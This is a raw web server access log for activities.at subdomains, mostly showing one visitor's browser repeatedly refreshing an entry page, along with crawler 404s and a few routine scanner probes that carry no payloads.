156.59.198.136 - - [10/Feb/2025:08:13:14 +0100] "GET /ed.activities.at/stats/lang/awstats-jp.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
45.227.254.8 - - [10/Feb/2025:08:16:33 +0100] "\x03" 400 383 "-" "-"
156.59.198.136 - - [10/Feb/2025:08:17:14 +0100] "GET /hausegger.activities.at/stats/lang/awstats-id.txt HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Feb/2025:08:43:55 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/dompdf_simple.png HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Feb/2025:08:47:55 +0100] "GET /ed.activities.at/stats/lang/awstats-gl.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.186.69 - - [10/Feb/2025:08:57:28 +0100] "GET /layout.php HTTP/1.1" 200 815 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:57:28 +0100] "GET /entry.php?id=10273 HTTP/1.1" 200 1903 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:57:28 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1760 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:57:28 +0100] "GET /entry.php?id=10270 HTTP/1.1" 200 908 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:57:28 +0100] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:57:29 +0100] "GET /gui/javascript/form_form.js?1739174249 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:57:29 +0100] "GET /gui/javascript/form_form.js?1739174249 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:57:29 +0100] "GET /gui/javascript/form_form.js?1739174249 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:57:29 +0100] "GET /gui/javascript/form_form.js?1739174249 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:57:29 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 934 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:57:29 +0100] "GET /entry.php?id=10287 HTTP/1.1" 200 2396 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:57:29 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 1903 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:57:29 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 908 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:57:33 +0100] "POST /entry.php?id=10287& HTTP/1.1" 200 1967 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:58:36 +0100] "GET /gui/javascript/form_form.js?1739174316 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:58:36 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 2013 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:58:36 +0100] "GET /entry.php?id=10270&__app__=10006038 HTTP/1.1" 200 2230 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:58:36 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:58:37 +0100] "GET /gui/javascript/form_form.js?1739174317 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:58:37 +0100] "GET /gui/javascript/form_form.js?1739174317 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:58:37 +0100] "GET /undefined HTTP/1.1" 404 289 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:58:37 +0100] "GET /framework/webfx/style/toolbar/images/cbback.gif HTTP/1.1" 404 318 "http://hausegger.activities.at/framework/webfx/style/toolbar/cb2.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:59:37 +0100] "GET /entry.php?id=10271&&ser=174316 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:08:59:37 +0100] "GET /gui/javascript/form_form.js?1739174377 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=174316" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:00:37 +0100] "GET /entry.php?id=10271&&ser=174377 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=174316" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:00:38 +0100] "GET /gui/javascript/form_form.js?1739174438 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=174377" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
40.118.210.74 - - [10/Feb/2025:09:01:06 +0100] "GET /portal/redlion HTTP/1.1" 404 286 "-" "Mozilla/5.0 zgrab/0.x"
178.165.186.69 - - [10/Feb/2025:09:01:38 +0100] "GET /entry.php?id=10271&&ser=174438 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=174377" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:01:38 +0100] "GET /gui/javascript/form_form.js?1739174498 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=174438" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:02:38 +0100] "GET /entry.php?id=10271&&ser=174498 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=174438" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:02:38 +0100] "GET /gui/javascript/form_form.js?1739174558 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=174498" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:03:38 +0100] "GET /entry.php?id=10271&&ser=174558 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=174498" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:03:39 +0100] "GET /gui/javascript/form_form.js?1739174618 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=174558" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:04:39 +0100] "GET /entry.php?id=10271&&ser=174618 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=174558" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:04:39 +0100] "GET /gui/javascript/form_form.js?1739174679 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=174618" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:05:39 +0100] "GET /entry.php?id=10271&&ser=174679 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=174618" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:05:39 +0100] "GET /gui/javascript/form_form.js?1739174739 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=174679" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:06:39 +0100] "GET /entry.php?id=10271&&ser=174739 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=174679" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:06:39 +0100] "GET /gui/javascript/form_form.js?1739174799 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=174739" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:07:40 +0100] "GET /entry.php?id=10271&&ser=174799 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=174739" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:07:40 +0100] "GET /gui/javascript/form_form.js?1739174860 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=174799" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:08:40 +0100] "GET /entry.php?id=10271&&ser=174860 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=174799" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:08:40 +0100] "GET /gui/javascript/form_form.js?1739174920 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=174860" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:09:40 +0100] "GET /entry.php?id=10271&&ser=174920 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=174860" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:09:40 +0100] "GET /gui/javascript/form_form.js?1739174980 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=174920" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:10:40 +0100] "GET /entry.php?id=10271&&ser=174980 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=174920" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:10:41 +0100] "GET /gui/javascript/form_form.js?1739175041 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=174980" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:11:41 +0100] "GET /entry.php?id=10271&&ser=175041 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=174980" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:11:41 +0100] "GET /gui/javascript/form_form.js?1739175101 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=175041" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:12:41 +0100] "GET /entry.php?id=10271&&ser=175101 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=175041" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:12:41 +0100] "GET /gui/javascript/form_form.js?1739175161 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=175101" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:13:41 +0100] "GET /entry.php?id=10271&&ser=175161 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=175101" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:13:41 +0100] "GET /gui/javascript/form_form.js?1739175221 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=175161" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:14:42 +0100] "GET /entry.php?id=10271&&ser=175221 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=175161" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:14:42 +0100] "GET /gui/javascript/form_form.js?1739175282 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=175221" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:15:42 +0100] "GET /entry.php?id=10271&&ser=175282 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=175221" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:15:42 +0100] "GET /gui/javascript/form_form.js?1739175342 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=175282" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:16:42 +0100] "GET /entry.php?id=10271&&ser=175342 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=175282" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:16:42 +0100] "GET /gui/javascript/form_form.js?1739175402 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=175342" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:17:43 +0100] "GET /entry.php?id=10271&&ser=175402 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=175342" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:17:43 +0100] "GET /gui/javascript/form_form.js?1739175463 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=175402" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:18:43 +0100] "GET /entry.php?id=10271&&ser=175463 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=175402" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:18:43 +0100] "GET /gui/javascript/form_form.js?1739175523 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=175463" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:19:43 +0100] "GET /entry.php?id=10271&&ser=175523 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=175463" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:19:43 +0100] "GET /gui/javascript/form_form.js?1739175583 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=175523" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:20:43 +0100] "GET /entry.php?id=10271&&ser=175583 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=175523" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:20:44 +0100] "GET /gui/javascript/form_form.js?1739175643 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=175583" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:21:44 +0100] "GET /entry.php?id=10271&&ser=175643 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=175583" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:21:44 +0100] "GET /gui/javascript/form_form.js?1739175704 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=175643" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
156.59.198.135 - - [10/Feb/2025:09:22:44 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908191503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.186.69 - - [10/Feb/2025:09:22:44 +0100] "GET /entry.php?id=10271&&ser=175704 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=175643" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:22:44 +0100] "GET /gui/javascript/form_form.js?1739175764 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=175704" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
185.196.220.253 - - [10/Feb/2025:09:22:45 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
178.165.186.69 - - [10/Feb/2025:09:23:44 +0100] "GET /entry.php?id=10271&&ser=175764 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=175704" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:23:44 +0100] "GET /gui/javascript/form_form.js?1739175824 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=175764" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:24:45 +0100] "GET /entry.php?id=10271&&ser=175824 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=175764" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:24:45 +0100] "GET /gui/javascript/form_form.js?1739175885 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=175824" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:25:45 +0100] "GET /entry.php?id=10271&&ser=175885 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=175824" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:25:45 +0100] "GET /gui/javascript/form_form.js?1739175945 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=175885" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:26:45 +0100] "GET /entry.php?id=10271&&ser=175945 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=175885" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:26:45 +0100] "GET /gui/javascript/form_form.js?1739176005 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=175945" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:27:45 +0100] "GET /entry.php?id=10271&&ser=176005 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=175945" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:27:46 +0100] "GET /gui/javascript/form_form.js?1739176066 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=176005" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:28:46 +0100] "GET /entry.php?id=10271&&ser=176066 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=176005" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:28:46 +0100] "GET /gui/javascript/form_form.js?1739176126 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=176066" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:29:46 +0100] "GET /entry.php?id=10271&&ser=176126 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=176066" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:29:46 +0100] "GET /gui/javascript/form_form.js?1739176186 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=176126" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:30:46 +0100] "GET /entry.php?id=10271&&ser=176186 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=176126" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:30:47 +0100] "GET /gui/javascript/form_form.js?1739176247 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=176186" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:31:47 +0100] "GET /entry.php?id=10271&&ser=176247 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=176186" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:31:47 +0100] "GET /gui/javascript/form_form.js?1739176307 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=176247" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
156.59.198.135 - - [10/Feb/2025:09:32:20 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image146.jpg HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.186.69 - - [10/Feb/2025:09:32:47 +0100] "GET /entry.php?id=10271&&ser=176307 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=176247" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:32:47 +0100] "GET /gui/javascript/form_form.js?1739176367 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=176307" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
146.19.24.76 - - [10/Feb/2025:09:33:18 +0100] "PUT /SDK/webLanguage HTTP/1.1" 405 297 "-" "Go-http-client/1.1"
178.165.186.69 - - [10/Feb/2025:09:33:47 +0100] "GET /entry.php?id=10271&&ser=176367 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=176307" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
178.165.186.69 - - [10/Feb/2025:09:33:48 +0100] "GET /gui/javascript/form_form.js?1739176428 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=176367" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0"
